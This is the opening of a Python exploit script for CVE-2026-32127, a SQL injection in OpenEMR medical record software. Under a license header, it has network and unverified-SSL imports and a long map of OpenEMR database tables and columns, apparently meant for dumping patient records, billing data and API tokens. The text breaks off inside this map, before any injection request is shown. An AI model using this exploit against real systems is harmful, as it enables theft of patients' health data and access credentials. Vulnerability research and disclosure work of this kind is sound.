README.md
Rendering markdown...
# =============================================================================
# Project Name: CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0
# File: exploit.py
# Description: Exploit for the CVE-2026-32127 (SQL Injection in Open EMR <8.0.0.1)
#
# Copyright (c) 2026 Christophe SUBLET, Grenoble INP - Esisar, UGA, CyberSkills, Orion
#
# This file is part of CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# =============================================================================
from urllib.request import urlopen, Request
from ssl import _create_unverified_context
from collections import defaultdict
from argparse import ArgumentParser
from urllib.parse import urlencode
from hashlib import sha1
from sys import exit
schema = {
"addresses": [
"id",
"line1",
"line2",
"city",
"state",
"zip",
"plus_four",
"country",
"foreign_id",
"district"
],
"amc_misc_data": [
"amc_id",
"pid",
"map_category",
"map_id",
"date_created",
"date_completed",
"soc_provided"
],
"amendments": [
"amendment_id",
"amendment_date",
"amendment_by",
"amendment_status",
"pid",
"amendment_desc",
"created_by",
"modified_by",
"created_time",
"modified_time"
],
"amendments_history": [
"amendment_id",
"amendment_note",
"amendment_status",
"created_by",
"created_time"
],
"api_log": [
"id",
"log_id",
"user_id",
"patient_id",
"ip_address",
"method",
"request",
"request_url",
"request_body",
"response",
"created_time"
],
"api_refresh_token": [
"id",
"user_id",
"client_id",
"token",
"expiry",
"revoked"
],
"api_token": [
"id",
"user_id",
"token",
"expiry",
"client_id",
"scope",
"revoked",
"context"
],
"ar_activity": [
"pid",
"encounter",
"sequence_no",
"code_type",
"code",
"modifier",
"payer_type",
"post_time",
"post_user",
"session_id",
"memo",
"pay_amount",
"adj_amount",
"modified_time",
"follow_up",
"follow_up_note",
"account_code",
"reason_code",
"deleted",
"post_date",
"payer_claim_number"
],
"ar_session": [
"session_id",
"payer_id",
"user_id",
"closed",
"reference",
"check_date",
"deposit_date",
"pay_total",
"created_time",
"modified_time",
"global_amount",
"payment_type",
"description",
"adjustment_code",
"post_to_date",
"patient_id",
"payment_method"
],
"audit_details": [
"id",
"field_name",
"field_value",
"audit_master_id",
"entry_identification"
],
"audit_master": [
"id",
"pid",
"user_id",
"approval_status",
"comments",
"created_time",
"modified_time",
"ip_address",
"type",
"is_qrda_document",
"is_unstructured_document"
],
"automatic_notification": [
"notification_id",
"sms_gateway_type",
"provider_name",
"message",
"email_sender",
"email_subject",
"type"
],
"background_services": [
"name",
"title",
"active",
"running",
"next_run",
"execute_interval",
"function",
"require_once",
"sort_order"
],
"batchcom": [
"id",
"patient_id",
"sent_by",
"msg_type",
"msg_subject",
"msg_text",
"msg_date_sent"
],
"benefit_eligibility": [
"response_id",
"verification_id",
"type",
"benefit_type",
"start_date",
"end_date",
"coverage_level",
"coverage_type",
"plan_type",
"plan_description",
"coverage_period",
"amount",
"percent",
"network_ind",
"message",
"response_status",
"response_create_date",
"response_modify_date"
],
"billing": [
"id",
"date",
"code_type",
"code",
"pid",
"provider_id",
"user",
"groupname",
"authorized",
"encounter",
"code_text",
"billed",
"activity",
"payer_id",
"bill_process",
"bill_date",
"process_date",
"process_file",
"modifier",
"units",
"fee",
"justify",
"target",
"x12_partner_id",
"ndc_info",
"notecodes",
"external_id",
"pricelevel",
"revenue_code",
"chargecat"
],
"calendar_external": [
"id",
"date",
"description",
"source"
],
"care_teams": [
"id",
"uuid",
"pid",
"status",
"team_name",
"note",
"date_created",
"date_updated",
"created_by",
"updated_by"
],
"care_team_member": [
"id",
"care_team_id",
"user_id",
"contact_id",
"role",
"facility_id",
"provider_since",
"status",
"date_created",
"date_updated",
"created_by",
"updated_by",
"note"
],
"categories": [
"id",
"name",
"value",
"parent",
"lft",
"rght",
"aco_spec",
"codes"
],
"categories_seq": [
"id"
],
"categories_to_documents": [
"category_id",
"document_id"
],
"ccda": [
"id",
"uuid",
"pid",
"encounter",
"ccda_data",
"time",
"status",
"updated_date",
"user_id",
"couch_docid",
"couch_revid",
"hash",
"view",
"transfer",
"emr_transfer",
"encrypted",
"transaction_id"
],
"ccda_components": [
"ccda_components_id",
"ccda_components_field",
"ccda_components_name",
"ccda_type"
],
"ccda_field_mapping": [
"id",
"table_id",
"ccda_field"
],
"ccda_sections": [
"ccda_sections_id",
"ccda_components_id",
"ccda_sections_field",
"ccda_sections_name",
"ccda_sections_req_mapping"
],
"ccda_table_mapping": [
"id",
"ccda_component",
"ccda_component_section",
"form_dir",
"form_type",
"form_table",
"user_id",
"deleted",
"timestamp"
],
"chart_tracker": [
"ct_pid",
"ct_when",
"ct_userid",
"ct_location"
],
"claims": [
"patient_id",
"encounter_id",
"version",
"payer_id",
"status",
"payer_type",
"bill_process",
"bill_time",
"process_time",
"process_file",
"target",
"x12_partner_id",
"submitted_claim"
],
"clinical_notes_documents": [
"id",
"clinical_note_id",
"document_id",
"created_at",
"created_by"
],
"clinical_notes_procedure_results": [
"id",
"clinical_note_id",
"procedure_result_id",
"created_at",
"created_by"
],
"clinical_plans": [
"id",
"pid",
"normal_flag",
"cqm_flag",
"cqm_2011_flag",
"cqm_2014_flag",
"cqm_measure_group"
],
"clinical_plans_rules": [
"plan_id",
"rule_id"
],
"clinical_rules": [
"id",
"pid",
"active_alert_flag",
"passive_alert_flag",
"cqm_flag",
"cqm_2011_flag",
"cqm_2014_flag",
"cqm_nqf_code",
"cqm_pqri_code",
"amc_flag",
"amc_2011_flag",
"amc_2014_flag",
"amc_2015_flag",
"amc_code",
"amc_code_2014",
"amc_code_2015",
"amc_2014_stage1_flag",
"amc_2014_stage2_flag",
"patient_reminder_flag",
"bibliographic_citation",
"developer",
"funding_source",
"release_version",
"web_reference",
"linked_referential_cds",
"access_control",
"patient_dob_usage",
"patient_ethnicity_usage",
"patient_health_status_usage",
"patient_gender_identity_usage",
"patient_language_usage",
"patient_race_usage",
"patient_sex_usage",
"patient_sexual_orientation_usage",
"patient_sodh_usage"
],
"clinical_rules_log": [
"id",
"date",
"pid",
"uid",
"category",
"value",
"new_value",
"facility_id"
],
"codes": [
"id",
"code_text",
"code_text_short",
"code",
"code_type",
"modifier",
"units",
"fee",
"superbill",
"related_code",
"taxrates",
"cyp_factor",
"active",
"reportable",
"financial_reporting",
"revenue_code"
],
"codes_history": [
"log_id",
"date",
"code",
"modifier",
"active",
"diagnosis_reporting",
"financial_reporting",
"category",
"code_type_name",
"code_text",
"code_text_short",
"prices",
"action_type",
"update_by"
],
"code_types": [
"ct_key",
"ct_id",
"ct_seq",
"ct_mod",
"ct_just",
"ct_mask",
"ct_fee",
"ct_rel",
"ct_nofs",
"ct_diag",
"ct_active",
"ct_label",
"ct_external",
"ct_claim",
"ct_proc",
"ct_term",
"ct_problem",
"ct_drug"
],
"contact": [
"id",
"foreign_id"
],
"contact_address": [
"id",
"contact_id",
"address_id",
"priority",
"type",
"use",
"notes",
"status",
"is_primary",
"created_date",
"period_start",
"period_end",
"inactivated_reason"
],
"contact_relation": [
"id",
"contact_id",
"target_table",
"target_id",
"active",
"role",
"relationship",
"contact_priority",
"is_primary_contact",
"is_emergency_contact",
"can_make_medical_decisions",
"can_receive_medical_info",
"start_date",
"end_date",
"notes",
"created_date",
"created_by",
"updated_date",
"updated_by"
],
"contact_telecom": [
"id",
"contact_id",
"rank",
"system",
"use",
"value",
"status",
"is_primary",
"notes",
"period_start",
"period_end",
"inactivated_reason",
"created_date",
"created_by",
"updated_date",
"updated_by"
],
"customlists": [
"cl_list_slno",
"cl_list_id",
"cl_list_item_id",
"cl_list_type",
"cl_list_item_short",
"cl_list_item_long",
"cl_list_item_level",
"cl_order",
"cl_deleted",
"cl_creator"
],
"dated_reminders": [
"dr_id",
"dr_from_ID",
"dr_message_text",
"dr_message_sent_date",
"dr_message_due_date",
"pid",
"message_priority",
"message_processed",
"processed_date",
"dr_processed_by"
],
"dated_reminders_link": [
"dr_link_id",
"dr_id",
"to_id"
],
"direct_message_log": [
"id",
"msg_type",
"msg_id",
"sender",
"recipient",
"create_ts",
"status",
"status_info",
"status_ts",
"patient_id",
"user_id"
],
"documents": [
"id",
"uuid",
"type",
"size",
"date",
"date_expires",
"url",
"thumb_url",
"mimetype",
"pages",
"owner",
"revision",
"foreign_id",
"docdate",
"hash",
"list_id",
"name",
"drive_uuid",
"couch_docid",
"couch_revid",
"storagemethod",
"path_depth",
"imported",
"encounter_id",
"encounter_check",
"audit_master_approval_status",
"audit_master_id",
"documentationOf",
"encrypted",
"document_data",
"deleted",
"foreign_reference_id",
"foreign_reference_table"
],
"documents_legal_categories": [
"dlc_id",
"dlc_category_type",
"dlc_category_name",
"dlc_category_parent"
],
"documents_legal_detail": [
"dld_id",
"dld_pid",
"dld_facility",
"dld_provider",
"dld_encounter",
"dld_master_docid",
"dld_signed",
"dld_signed_time",
"dld_filepath",
"dld_filename",
"dld_signing_person",
"dld_sign_level",
"dld_content",
"dld_file_for_pdf_generation",
"dld_denial_reason",
"dld_moved",
"dld_patient_comments"
],
"documents_legal_master": [
"dlm_category",
"dlm_subcategory",
"dlm_document_id",
"dlm_document_name",
"dlm_filepath",
"dlm_facility",
"dlm_provider",
"dlm_sign_height",
"dlm_sign_width",
"dlm_filename",
"dlm_effective_date",
"dlm_version",
"content",
"dlm_savedsign",
"dlm_review",
"dlm_upload_type"
],
"document_templates": [
"id",
"pid",
"provider",
"encounter",
"modified_date",
"profile",
"category",
"location",
"template_name",
"status",
"send_date",
"end_date",
"size",
"template_content",
"mime"
],
"document_template_profiles": [
"id",
"template_id",
"profile",
"template_name",
"category",
"provider",
"modified_date",
"member_of",
"active",
"recurring",
"event_trigger",
"period",
"notify_trigger",
"notify_period"
],
"drugs": [
"drug_id",
"uuid",
"name",
"ndc_number",
"on_order",
"reorder_point",
"max_level",
"last_notify",
"reactions",
"form",
"size",
"unit",
"route",
"substitute",
"related_code",
"cyp_factor",
"active",
"allow_combining",
"allow_multiple",
"drug_code",
"consumable",
"dispensable",
"date_created",
"last_updated"
],
"drug_inventory": [
"inventory_id",
"drug_id",
"lot_number",
"expiration",
"manufacturer",
"on_hand",
"warehouse_id",
"vendor_id",
"last_notify",
"destroy_date",
"destroy_method",
"destroy_witness",
"destroy_notes"
],
"drug_sales": [
"sale_id",
"drug_id",
"inventory_id",
"prescription_id",
"pid",
"encounter",
"user",
"sale_date",
"quantity",
"fee",
"billed",
"xfer_inventory_id",
"distributor_id",
"notes",
"bill_date",
"pricelevel",
"selector",
"trans_type",
"chargecat",
"uuid",
"pharmacy_supply_type",
"last_updated",
"date_created",
"updated_by",
"created_by"
],
"drug_templates": [
"drug_id",
"selector",
"dosage",
"period",
"quantity",
"refills",
"taxrates",
"pkgqty"
],
"dsi_source_attributes": [
"id",
"client_id",
"list_id",
"option_id",
"clinical_rule_id",
"source_value",
"created_by",
"last_updated_by",
"created_at",
"last_updated_at"
],
"edi_sequences": [
"id"
],
"eligibility_verification": [
"verification_id",
"response_id",
"insurance_id",
"eligibility_check_date",
"copay",
"deductible",
"deductiblemet",
"create_date"
],
"email_queue": [
"id",
"sender",
"recipient",
"subject",
"body",
"datetime_queued",
"sent",
"datetime_sent",
"error",
"error_message",
"datetime_error",
"template_name"
],
"employer_data": [
"id",
"name",
"street",
"street_line_2",
"postal_code",
"city",
"state",
"country",
"date",
"pid",
"start_date",
"end_date",
"occupation",
"industry",
"created_by",
"uuid"
],
"enc_category_map": [
"rule_enc_id",
"main_cat_id"
],
"erx_narcotics": [
"id",
"drug",
"dea_number",
"csa_sch",
"narc",
"other_names"
],
"erx_rx_log": [
"id",
"prescription_id",
"date",
"time",
"code",
"status",
"message_id",
"read"
],
"erx_ttl_touch": [
"patient_id",
"process",
"updated"
],
"esign_signatures": [
"id",
"tid",
"table",
"uid",
"datetime",
"is_lock",
"amendment",
"hash",
"signature_hash"
],
"export_job": [
"id",
"uuid",
"user_id",
"client_id",
"status",
"start_time",
"resource_include_time",
"output_format",
"request_uri",
"resources",
"output",
"errors",
"access_token_id"
],
"extended_log": [
"id",
"date",
"event",
"user",
"recipient",
"description",
"patient_id"
],
"external_encounters": [
"ee_id",
"ee_date",
"ee_pid",
"ee_provider_id",
"ee_facility_id",
"ee_encounter_diagnosis",
"ee_external_id"
],
"external_procedures": [
"ep_id",
"ep_date",
"ep_code_type",
"ep_code",
"ep_pid",
"ep_encounter",
"ep_code_text",
"ep_facility_id",
"ep_external_id"
],
"facility": [
"id",
"uuid",
"name",
"phone",
"fax",
"street",
"city",
"state",
"postal_code",
"country_code",
"federal_ein",
"website",
"email",
"service_location",
"billing_location",
"accepts_assignment",
"pos_code",
"x12_sender_id",
"attn",
"domain_identifier",
"facility_npi",
"facility_taxonomy",
"tax_id_type",
"color",
"primary_business_entity",
"facility_code",
"extra_validation",
"mail_street",
"mail_street2",
"mail_city",
"mail_state",
"mail_zip",
"oid",
"iban",
"info",
"weno_id",
"inactive",
"date_created",
"last_updated"
],
"facility_user_ids": [
"id",
"uid",
"facility_id",
"uuid",
"field_id",
"field_value",
"date_created",
"last_updated"
],
"fee_schedule": [
"id",
"insurance_company_id",
"plan",
"code",
"modifier",
"type",
"fee",
"effective_date"
],
"fee_sheet_options": [
"fs_category",
"fs_option",
"fs_codes"
],
"forms": [
"id",
"date",
"encounter",
"form_name",
"form_id",
"pid",
"user",
"groupname",
"authorized",
"deleted",
"formdir",
"therapy_group_id",
"issue_id",
"provider_id"
],
"form_care_plan": [
"id",
"date",
"pid",
"encounter",
"user",
"groupname",
"authorized",
"activity",
"code",
"codetext",
"description",
"external_id",
"care_plan_type",
"note_related_to",
"date_end",
"reason_code",
"reason_description",
"reason_date_low",
"reason_date_high",
"reason_status",
"plan_status",
"proposed_date"
],
"form_clinical_instructions": [
"id",
"pid",
"encounter",
"user",
"instruction",
"date",
"activity"
],
"form_clinical_notes": [
"id",
"form_id",
"uuid",
"date",
"pid",
"encounter",
"user",
"groupname",
"authorized",
"activity",
"code",
"codetext",
"description",
"external_id",
"clinical_notes_type",
"clinical_notes_category",
"note_related_to",
"last_updated"
],
"form_dictation": [
"id",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity",
"dictation",
"additional_notes"
],
"form_encounter": [
"id",
"uuid",
"date",
"reason",
"facility",
"facility_id",
"pid",
"encounter",
"onset_date",
"sensitivity",
"billing_note",
"pc_catid",
"last_level_billed",
"last_level_closed",
"last_stmt_date",
"stmt_count",
"provider_id",
"supervisor_id",
"invoice_refno",
"referral_source",
"billing_facility",
"external_id",
"pos_code",
"parent_encounter_id",
"class_code",
"shift",
"voucher_number",
"discharge_disposition",
"encounter_type_code",
"encounter_type_description",
"referring_provider_id",
"date_end",
"in_collection",
"last_update",
"ordering_provider_id"
],
"form_eye_acuity": [
"id",
"pid",
"SCODVA",
"SCOSVA",
"PHODVA",
"PHOSVA",
"CTLODVA",
"CTLOSVA",
"MRODVA",
"MROSVA",
"SCNEARODVA",
"SCNEAROSVA",
"MRNEARODVA",
"MRNEAROSVA",
"GLAREODVA",
"GLAREOSVA",
"GLARECOMMENTS",
"ARODVA",
"AROSVA",
"CRODVA",
"CROSVA",
"CTLODVA1",
"CTLOSVA1",
"PAMODVA",
"PAMOSVA",
"LIODVA",
"LIOSVA",
"WODVANEAR",
"OSVANEARCC",
"BINOCVA"
],
"form_eye_antseg": [
"id",
"pid",
"ODSCHIRMER1",
"OSSCHIRMER1",
"ODSCHIRMER2",
"OSSCHIRMER2",
"ODTBUT",
"OSTBUT",
"OSCONJ",
"ODCONJ",
"ODCORNEA",
"OSCORNEA",
"ODAC",
"OSAC",
"ODLENS",
"OSLENS",
"ODIRIS",
"OSIRIS",
"PUPIL_NORMAL",
"ODPUPILSIZE1",
"ODPUPILSIZE2",
"ODPUPILREACTIVITY",
"ODAPD",
"OSPUPILSIZE1",
"OSPUPILSIZE2",
"OSPUPILREACTIVITY",
"OSAPD",
"DIMODPUPILSIZE1",
"DIMODPUPILSIZE2",
"DIMODPUPILREACTIVITY",
"DIMOSPUPILSIZE1",
"DIMOSPUPILSIZE2",
"DIMOSPUPILREACTIVITY",
"PUPIL_COMMENTS",
"ODKTHICKNESS",
"OSKTHICKNESS",
"ODGONIO",
"OSGONIO",
"ANTSEG_COMMENTS"
],
"form_eye_base": [
"id",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity"
],
"form_eye_biometrics": [
"id",
"pid",
"ODK1",
"ODK2",
"ODK2AXIS",
"OSK1",
"OSK2",
"OSK2AXIS",
"ODAXIALLENGTH",
"OSAXIALLENGTH",
"ODPDMeasured",
"OSPDMeasured",
"ODACD",
"OSACD",
"ODW2W",
"OSW2W",
"ODLT",
"OSLT"
],
"form_eye_external": [
"id",
"pid",
"RUL",
"LUL",
"RLL",
"LLL",
"RBROW",
"LBROW",
"RMCT",
"LMCT",
"RADNEXA",
"LADNEXA",
"RMRD",
"LMRD",
"RLF",
"LLF",
"RVFISSURE",
"LVFISSURE",
"ODHERTEL",
"OSHERTEL",
"HERTELBASE",
"RCAROTID",
"LCAROTID",
"RTEMPART",
"LTEMPART",
"RCNV",
"LCNV",
"RCNVII",
"LCNVII",
"EXT_COMMENTS"
],
"form_eye_hpi": [
"id",
"pid",
"CC1",
"HPI1",
"QUALITY1",
"TIMING1",
"DURATION1",
"CONTEXT1",
"SEVERITY1",
"MODIFY1",
"ASSOCIATED1",
"LOCATION1",
"CHRONIC1",
"CHRONIC2",
"CHRONIC3",
"CC2",
"HPI2",
"QUALITY2",
"TIMING2",
"DURATION2",
"CONTEXT2",
"SEVERITY2",
"MODIFY2",
"ASSOCIATED2",
"LOCATION2",
"CC3",
"HPI3",
"QUALITY3",
"TIMING3",
"DURATION3",
"CONTEXT3",
"SEVERITY3",
"MODIFY3",
"ASSOCIATED3",
"LOCATION3"
],
"form_eye_locking": [
"id",
"pid",
"IMP",
"PLAN",
"Resource",
"Technician",
"LOCKED",
"LOCKEDDATE",
"LOCKEDBY"
],
"form_eye_mag_dispense": [
"id",
"date",
"encounter",
"pid",
"user",
"groupname",
"authorized",
"activity",
"REFDATE",
"REFTYPE",
"RXTYPE",
"ODSPH",
"ODCYL",
"ODAXIS",
"OSSPH",
"OSCYL",
"OSAXIS",
"ODMIDADD",
"OSMIDADD",
"ODADD",
"OSADD",
"ODHPD",
"ODHBASE",
"ODVPD",
"ODVBASE",
"ODSLABOFF",
"ODVERTEXDIST",
"OSHPD",
"OSHBASE",
"OSVPD",
"OSVBASE",
"OSSLABOFF",
"OSVERTEXDIST",
"ODMPDD",
"ODMPDN",
"OSMPDD",
"OSMPDN",
"BPDD",
"BPDN",
"LENS_MATERIAL",
"LENS_TREATMENTS",
"CTLMANUFACTUREROD",
"CTLMANUFACTUREROS",
"CTLSUPPLIEROD",
"CTLSUPPLIEROS",
"CTLBRANDOD",
"CTLBRANDOS",
"CTLODQUANTITY",
"CTLOSQUANTITY",
"ODDIAM",
"ODBC",
"OSDIAM",
"OSBC",
"RXCOMMENTS",
"COMMENTS"
],
"form_eye_mag_impplan": [
"id",
"form_id",
"pid",
"title",
"code",
"codetype",
"codedesc",
"codetext",
"plan",
"PMSFH_link",
"IMPPLAN_order"
],
"form_eye_mag_orders": [
"id",
"form_id",
"pid",
"ORDER_DETAILS",
"ORDER_STATUS",
"ORDER_PRIORITY",
"ORDER_DATE_PLACED",
"ORDER_PLACED_BYWHOM",
"ORDER_DATE_COMPLETED",
"ORDER_COMPLETED_BYWHOM"
],
"form_eye_mag_prefs": [
"PEZONE",
"LOCATION",
"LOCATION_text",
"id",
"selection",
"ZONE_ORDER",
"GOVALUE",
"ordering",
"FILL_ACTION",
"GORIGHT",
"GOLEFT",
"UNSPEC"
],
"form_eye_mag_wearing": [
"id",
"ENCOUNTER",
"FORM_ID",
"PID",
"RX_NUMBER",
"ODSPH",
"ODCYL",
"ODAXIS",
"OSSPH",
"OSCYL",
"OSAXIS",
"ODMIDADD",
"OSMIDADD",
"ODADD",
"OSADD",
"ODVA",
"OSVA",
"ODNEARVA",
"OSNEARVA",
"ODHPD",
"ODHBASE",
"ODVPD",
"ODVBASE",
"ODSLABOFF",
"ODVERTEXDIST",
"OSHPD",
"OSHBASE",
"OSVPD",
"OSVBASE",
"OSSLABOFF",
"OSVERTEXDIST",
"ODMPDD",
"ODMPDN",
"OSMPDD",
"OSMPDN",
"BPDD",
"BPDN",
"LENS_MATERIAL",
"LENS_TREATMENTS",
"RX_TYPE",
"COMMENTS"
],
"form_eye_neuro": [
"id",
"pid",
"ACT",
"ACT5CCDIST",
"ACT1CCDIST",
"ACT2CCDIST",
"ACT3CCDIST",
"ACT4CCDIST",
"ACT6CCDIST",
"ACT7CCDIST",
"ACT8CCDIST",
"ACT9CCDIST",
"ACT10CCDIST",
"ACT11CCDIST",
"ACT1SCDIST",
"ACT2SCDIST",
"ACT3SCDIST",
"ACT4SCDIST",
"ACT5SCDIST",
"ACT6SCDIST",
"ACT7SCDIST",
"ACT8SCDIST",
"ACT9SCDIST",
"ACT10SCDIST",
"ACT11SCDIST",
"ACT1SCNEAR",
"ACT2SCNEAR",
"ACT3SCNEAR",
"ACT4SCNEAR",
"ACT5CCNEAR",
"ACT6CCNEAR",
"ACT7CCNEAR",
"ACT8CCNEAR",
"ACT9CCNEAR",
"ACT10CCNEAR",
"ACT11CCNEAR",
"ACT5SCNEAR",
"ACT6SCNEAR",
"ACT7SCNEAR",
"ACT8SCNEAR",
"ACT9SCNEAR",
"ACT10SCNEAR",
"ACT11SCNEAR",
"ACT1CCNEAR",
"ACT2CCNEAR",
"ACT3CCNEAR",
"ACT4CCNEAR",
"MOTILITYNORMAL",
"MOTILITY_RS",
"MOTILITY_RI",
"MOTILITY_RR",
"MOTILITY_RL",
"MOTILITY_LS",
"MOTILITY_LI",
"MOTILITY_LR",
"MOTILITY_LL",
"MOTILITY_RRSO",
"MOTILITY_RLSO",
"MOTILITY_RRIO",
"MOTILITY_RLIO",
"MOTILITY_LRSO",
"MOTILITY_LLSO",
"MOTILITY_LRIO",
"MOTILITY_LLIO",
"NEURO_COMMENTS",
"STEREOPSIS",
"ODNPA",
"OSNPA",
"VERTFUSAMPS",
"DIVERGENCEAMPS",
"NPC",
"DACCDIST",
"DACCNEAR",
"CACCDIST",
"CACCNEAR",
"ODCOLOR",
"OSCOLOR",
"ODCOINS",
"OSCOINS",
"ODREDDESAT",
"OSREDDESAT"
],
"form_eye_postseg": [
"id",
"pid",
"ODDISC",
"OSDISC",
"ODCUP",
"OSCUP",
"ODMACULA",
"OSMACULA",
"ODVESSELS",
"OSVESSELS",
"ODVITREOUS",
"OSVITREOUS",
"ODPERIPH",
"OSPERIPH",
"ODCMT",
"OSCMT",
"RETINA_COMMENTS",
"DIL_RISKS",
"DIL_MEDS",
"WETTYPE",
"ATROPINE",
"CYCLOMYDRIL",
"TROPICAMIDE",
"CYCLOGYL",
"NEO25"
],
"form_eye_refraction": [
"id",
"pid",
"MRODSPH",
"MRODCYL",
"MRODAXIS",
"MRODPRISM",
"MRODBASE",
"MRODADD",
"MROSSPH",
"MROSCYL",
"MROSAXIS",
"MROSPRISM",
"MROSBASE",
"MROSADD",
"MRODNEARSPHERE",
"MRODNEARCYL",
"MRODNEARAXIS",
"MRODPRISMNEAR",
"MRODBASENEAR",
"MROSNEARSHPERE",
"MROSNEARCYL",
"MROSNEARAXIS",
"MROSPRISMNEAR",
"MROSBASENEAR",
"CRODSPH",
"CRODCYL",
"CRODAXIS",
"CROSSPH",
"CROSCYL",
"CROSAXIS",
"CRCOMMENTS",
"BALANCED",
"ARODSPH",
"ARODCYL",
"ARODAXIS",
"AROSSPH",
"AROSCYL",
"AROSAXIS",
"ARODADD",
"AROSADD",
"ARNEARODVA",
"ARNEAROSVA",
"ARODPRISM",
"AROSPRISM",
"CTLODSPH",
"CTLODCYL",
"CTLODAXIS",
"CTLODBC",
"CTLODDIAM",
"CTLOSSPH",
"CTLOSCYL",
"CTLOSAXIS",
"CTLOSBC",
"CTLOSDIAM",
"CTL_COMMENTS",
"CTLMANUFACTUREROD",
"CTLSUPPLIEROD",
"CTLBRANDOD",
"CTLMANUFACTUREROS",
"CTLSUPPLIEROS",
"CTLBRANDOS",
"CTLODADD",
"CTLOSADD",
"NVOCHECKED",
"ADDCHECKED"
],
"form_eye_ros": [
"id",
"pid",
"ROSGENERAL",
"ROSHEENT",
"ROSCV",
"ROSPULM",
"ROSGI",
"ROSGU",
"ROSDERM",
"ROSNEURO",
"ROSPSYCH",
"ROSMUSCULO",
"ROSIMMUNO",
"ROSENDOCRINE",
"ROSCOMMENTS"
],
"form_eye_vitals": [
"id",
"pid",
"alert",
"oriented",
"confused",
"ODIOPAP",
"OSIOPAP",
"ODIOPTPN",
"OSIOPTPN",
"ODIOPFTN",
"OSIOPFTN",
"IOPTIME",
"ODIOPPOST",
"OSIOPPOST",
"IOPPOSTTIME",
"ODIOPTARGET",
"OSIOPTARGET",
"AMSLEROD",
"AMSLEROS",
"ODVF1",
"ODVF2",
"ODVF3",
"ODVF4",
"OSVF1",
"OSVF2",
"OSVF3",
"OSVF4"
],
"form_functional_cognitive_status": [
"id",
"date",
"pid",
"encounter",
"user",
"groupname",
"authorized",
"activity",
"code",
"codetext",
"description",
"external_id"
],
"form_groups_encounter": [
"id",
"date",
"reason",
"facility",
"facility_id",
"group_id",
"encounter",
"onset_date",
"sensitivity",
"billing_note",
"pc_catid",
"last_level_billed",
"last_level_closed",
"last_stmt_date",
"stmt_count",
"provider_id",
"supervisor_id",
"invoice_refno",
"referral_source",
"billing_facility",
"external_id",
"pos_code",
"counselors",
"appt_id"
],
"form_group_attendance": [
"id",
"date",
"group_id",
"user",
"groupname",
"authorized",
"encounter_id",
"activity"
],
"form_history_sdoh": [
"id",
"uuid",
"pid",
"encounter",
"created_at",
"updated_at",
"created_by",
"updated_by",
"assessment_date",
"screening_tool",
"assessor",
"food_insecurity",
"food_insecurity_notes",
"housing_instability",
"housing_instability_notes",
"transportation_insecurity",
"transportation_insecurity_notes",
"utilities_insecurity",
"utilities_insecurity_notes",
"interpersonal_safety",
"interpersonal_safety_notes",
"financial_strain",
"financial_strain_notes",
"social_isolation",
"social_isolation_notes",
"childcare_needs",
"childcare_needs_notes",
"digital_access",
"digital_access_notes",
"employment_status",
"education_level",
"caregiver_status",
"veteran_status",
"pregnancy_status",
"pregnancy_edd",
"pregnancy_intent",
"postpartum_status",
"postpartum_end",
"goals",
"interventions",
"instrument_score",
"positive_domain_count",
"declined_flag",
"disability_status",
"disability_status_notes",
"disability_scale",
"hunger_q1",
"hunger_q2",
"hunger_score"
],
"form_history_sdoh_health_concerns": [
"id",
"sdoh_history_id",
"health_concern_id",
"created_at",
"created_by"
],
"form_misc_billing_options": [
"id",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity",
"employment_related",
"auto_accident",
"accident_state",
"other_accident",
"medicaid_referral_code",
"epsdt_flag",
"provider_qualifier_code",
"provider_id",
"outside_lab",
"lab_amount",
"is_unable_to_work",
"onset_date",
"date_initial_treatment",
"off_work_from",
"off_work_to",
"is_hospitalized",
"hospitalization_date_from",
"hospitalization_date_to",
"medicaid_resubmission_code",
"medicaid_original_reference",
"prior_auth_number",
"comments",
"replacement_claim",
"icn_resubmission_number",
"box_14_date_qual",
"box_15_date_qual",
"encounter"
],
"form_observation": [
"form_id",
"date",
"pid",
"encounter",
"user",
"groupname",
"authorized",
"activity",
"code",
"observation",
"ob_value",
"ob_unit",
"description",
"code_type",
"table_code",
"ob_code",
"ob_type",
"ob_status",
"result_status",
"ob_reason_status",
"ob_reason_code",
"ob_reason_text",
"ob_documentationof_table",
"ob_documentationof_table_id",
"date_end",
"id",
"parent_observation_id",
"category",
"questionnaire_response_id",
"uuid",
"ob_value_code_description"
],
"form_questionnaire_assessments": [
"id",
"date",
"response_id",
"pid",
"user",
"groupname",
"authorized",
"activity",
"copyright",
"form_name",
"response_meta",
"questionnaire_id",
"questionnaire",
"questionnaire_response",
"lform",
"lform_response",
"category"
],
"form_reviewofs": [
"id",
"date",
"pid",
"user",
"groupname",
"authorized",
"activity",
"fever",
"chills",
"night_sweats",
"weight_loss",
"poor_appetite",
"insomnia",
"fatigued",
"depressed",
"hyperactive",
"exposure_to_foreign_countries",
"cataracts",
"cataract_surgery",
"glaucoma",
"double_vision",
"blurred_vision",
"poor_hearing",
"headaches",
"ringing_in_ears",
"bloody_nose",
"sinusitis",
"sinus_surgery",
"dry_mouth",
"strep_throat",
"tonsillectomy",
"swollen_lymph_nodes",
"throat_cancer",
"throat_cancer_surgery",
"heart_attack",
"irregular_heart_beat",
"chest_pains",
"shortness_of_breath",
"high_blood_pressure",
"heart_failure",
"poor_circulation",
"vascular_surgery",
"cardiac_catheterization",
"coronary_artery_bypass",
"heart_transplant",
"stress_test",
"emphysema",
"chronic_bronchitis",
"interstitial_lung_disease",
"shortness_of_breath_2",
"lung_cancer",
"lung_cancer_surgery",
"pheumothorax",
